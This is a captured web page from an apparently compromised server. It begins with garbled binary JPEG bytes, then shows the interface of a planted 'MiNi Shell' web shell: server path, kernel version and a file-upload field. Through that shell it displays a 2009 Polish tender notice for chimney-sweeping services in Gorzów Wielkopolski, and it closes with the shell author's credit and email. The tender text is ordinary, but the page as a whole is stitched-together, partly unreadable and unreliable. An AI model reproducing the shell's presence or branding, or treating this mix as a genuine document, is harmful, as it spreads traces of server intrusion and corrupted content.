JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090224/39154-N-2009.html

<p class="kh_header"><b>Gorzów Wielkopolski: Świadczenie usług kominiarskich w budynkach gminnych administrowanych przez Zakład Gospodarki Mieszkaniowej   w Gorzowie Wlkp. w rejonie ADM nr 1-5.</b><br>
<b>Numer ogłoszenia: 39154 - 2009; data zamieszczenia: 24.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej , ul. Wełniany Rynek 3, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7387101 (-02), faks 095 7387100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgm.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług kominiarskich w budynkach gminnych administrowanych przez Zakład Gospodarki Mieszkaniowej   w Gorzowie Wlkp. w rejonie ADM nr 1-5..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> USŁUGI  STAŁE
Zakres prac będących przedmiotem zamówienia przetargowego obejmuje wszystkie czynności mające na celu zapewnienie prawidłowego i bezpiecznego funkcjonowania kominów i przewodów kominowych oraz ich utrzymanie w należytym stanie a   w szczególności :
Do obowiązków  Wykonawcy  należy świadczenie :
1.  Usług kominiarskich stałych , które  obejmują :
1.1. Czyszczenie przewodów kominowych, dymowych, spalinowych, wentylacyjnych, czopuchów, kanałów połączeniowych, itp.
-  od palenisk opalanych paliwem stałym                                - 4 razy w roku    
-  od palenisk opalanych paliwem ciekłym lub gazowym            - 2 razy w roku    
-  od przewodów wentylacyjnych       - 1  raz w roku  ,  jeżeli większa częstotliwość nie wynika z warunków użytkowych
Uwaga!  
Częstotliwość okresowego czyszczenia przewodów kominowych wynika z § 30 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006r w sprawie ochrony przeciwpożarowej budynków , innych obiektów i terenów ( Dz.U. Nr  80, poz. 563 )
1.2. Usługa czyszczenia kanałów kominowych winna  być wykonana  przy pomocy :
-    kompletu linowego ze szczotkami dopasowanymi do przekroju przewodów kominowych,
-	przepychacza (gurówki) ze szczotkami dopasowanymi do przekroju przewodu kominowego.
1.3. Czyszczenie przewodów kominowych powinno  być zakończone wybraniem sadzy z przewodu kominowego  i wyniesieniem  jej z budynku. Wybieranie sadzy ze spadu  kominowego winno być wykonywane przy użyciu gracy do wybierania sadzy   i niepalnego worka kominiarskiego.
Realizacja czynności wykazanych w pkt. 1. - usługi stałe, powinna przebiegać z częstotliwością wynikającą z cytowanych przepisów oraz w oparciu o opracowany przez Wykonawcę harmonogram czyszczeń i kontroli.
2. Ocena  stanu  technicznego  przewodów  kominowych ( przegląd  roczny) 
       obejmująca : 
2.1. Sprawdzenie wykonania zaleceń wynikających z poprzedniej kontroli okresowej 
2.2. Sprawdzenie stanu technicznego elementów budynku objętych kontrolą ( w tym: 
        kominów ich przewodów, czopuchów, odgałęzień, głowic i nasad kominowych, drzwiczek wycierowych i rewizyjnych).   
2.3. Sprawdzenie prawidłowości funkcjonowania przewodów poprzez sprawdzenie ich drożności, prawidłowego ciągu kominowego, oraz prawidłowości podłączeń urządzeń (w tym wyposażenia we wkłady kominowe przewodów kominowych odprowadzających spaliny z urządzeń grzewczych gazowych- zgodnie z wymogami prawa ) i kratek wentylacyjnych do przewodów kominowych 
2.4. Sprawdzenie prawidłowości i stanu technicznego wyposażenia budynków to jest : 
włazy dachowe, ławy kominiarskie, drabiny itp. zapewniającego dogodny dostęp w celu wykonania  czynności stałej obsługi.
2.5. Sprawdzenie przestrzegania przepisów ppoż, w zakresie białkowania kominów i składowania na strychach materiałów  łatwopalnych. 
2.6. Występowania innych stwierdzonych w trakcie kontroli uszkodzeń i nieprawidłowości mogących spowodować zagrożenie bezpieczeństwa ludzi, uszkodzeń mienia.
2.7.  Sporządzenie protokołu pokontrolnego  wraz z uwzględnieniem wytycznych.
Roczna okresowa kontrola stanu technicznego sprawności przewodów kominowych i podłączeń w obsługiwanych budynkach (wartość za usługę nie może przekroczyć 50% wartości usług stałych).

3. Przeprowadzenie kontroli okresowej przewodów kominowych pod kątem przygotowania :
3.1. Sezonu grzewczego  kotłowni lokalnych. 
3.2.	Sprawdzenie drożności, prawidłowego ciągu kominowego, prawidłowo działających wentylacji nawiewnej i wywiewnej itp.
Uwaga !
Na okoliczność wykonania :
- przeglądu, winien być sporządzony protokół kontroli, który wraz z dokumentami  tj. wykonanym szkicem                        z naniesieniem rzutu pionowego przewodów kominowych, z naniesieniem ich numeracji, numeracji pionów, naniesieniem drożności, oznaczeniem rodzaju wylotów, przypisaniu podłączeń do każdego przewodu. Winien być dostarczone Zamawiającemu. Ponadto każdy rysunek winien zawierać znaki ukierunkowujące szkic względem ulicy. Wszelkie usterki związane z brakiem drożności, nieprawidłowymi podłączeniami, brakiem szczelności itp., wykazane w protokole, powinny mieć odesłanie do numeru pionu, oraz przewodu i obsługiwanego przezeń podłączenia. Oznaczenia podłączeń powinny być czytelne dla Zamawiającego. Protokół z kontroli stanowił będzie  załącznik do książki obiektu budowlanego,
- czyszczeń przewodów kominowych,  winien być dokonany wpis do książki kominiarskiej.
Powyższe usługi kominiarskie wynikają z  art. 62 ust. 1 pkt. 1 lit. c z dnia 07.07.1994r. Prawo Budowlane. ustawa z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.)
Kontrolę stanu technicznego przewodów kominowych winny przeprowadzać osoby posiadające odpowiednie kwalifikacje, wynikające z postanowień art. 62 ust. 6  ustawy Prawo Budowlane. 

4.Sporządzanie opinii kominiarskich (mi.) pod potrzeby :
-    dokumentacji technicznej,
-    lokali remontowanych z ruchu ludności
-    projektów związanych z  wymianą instalacji gazowych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 u Pzp
2. spełniają wymogi art. 22 ust. 1  u Pzp tj.:
2.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
-dysponują  uprawnieniami na prowadzenie działalności zgodnej  z przedmiotem zamówienia,
2.2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym, osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
 W celu spełnienia  powyższego warunku wykonawca obowiązany  jest wykazać:
-wykonanie usług  w okresie ostatnich trzech lat ,a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia,  z podaniem ich wartości oraz dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
W celu spełnienia powyższego warunku należy wykazać posiadanie polisy OC w zakresie prowadzonej działalności.
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełnienia wymienionych wyżej warunków zostanie dokonana zgodnie z formułą spełnia/nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w pkt. 10 siwz. 
O ile nie zaistnieją okoliczności, które powodowałyby unieważnienie postępowania, to zamawiający na mocy art. 26 ust. 1 pkt. 3 i 4 u Pzp:
- w wyznaczonym przez siebie terminie wezwie wykonawców do uzupełnienia niezłożonych a wymaganych  dokumentów potwierdzających spełnienie warunków uczestnictwa w postępowaniu, dokumentów złożonych  a zawierających błędy lub złożonych wadliwych pełnomocnictw,
- w wyznaczonym przez siebie terminie wezwie wykonawców do złożenia wyjaśnień dotyczących oświadczeń   i dokumentów o których mowa w art. 25 ust. 1 u Pzp, potwierdzających spełnienie przez oferowane wyroby warunków określonych przez zamawiającego w siwz.
Złożone  na wezwanie zamawiającego oświadczenia i dokumenty winny potwierdzić spełnienie przez   wykonawcę warunków udziału  w postępowaniu oraz spełnienie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oferta  powinna zawierać następujące dokumenty i oświadczenia: wypełniony formularz oferty, wraz z oświadczeniem o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  Pzp (Dz. U. z  2007r r. Nr 223, poz. 1655 ze zm.) oraz oświadczeniem, że zapoznał się z treścią załączonego wzoru umowy i akceptuje ją bez zastrzeżeń oraz zobowiązuje się w przypadku wyboru  do jej zawarcia w miejscu i terminie wyznaczonym przez Zamawiającego,
2.	aktualny (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) odpis z właściwego rejestru lub zaświadczenie   o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy  wymagają  wpisu do rejestru lub zgłoszenia ewidencji działalności gospodarczej,
3.	oryginał pełnomocnictwa podpisany przez ustanowionych przedstawicieli Wykonawcy- dotyczy Wykonawców reprezentowanych przez pełnomocnika oraz Wykonawców składających wspólną ofertę ( konsorcjum) 
Uwaga !
Wymagana jest forma pisemna a pełnomocnictwo winno określać rodzaj  czynności do których pełnomocnik jest umocowany do reprezentowania w przedmiotowym postępowaniu (w szczególności do  podpisania oferty) albo do reprezentowania w przedmiotowym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
4.	kopię polisy ubezpieczeniowej o odpowiedzialności cywilnej w zakresie prowadzonej działalności.
5.	wykaz usług  wykonanych w okresie ostatnich trzech lat  licząc wstecz od terminu składania ofert (a jeżeli okres działalności jest krótszy - w tym okresie) z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów  potwierdzających, że usługi zostały wykonane należycie
6.	wykaz osób i podmiotów wraz z  kserokopią  uprawnień kominiarskich.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zgm.bip.gorzow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZGM ul. Wełniany Rynek 3, 66-400 Gorzów Wlkp. pok. 19.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2009 godzina 10:00, miejsce: sekretariat ZGM.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com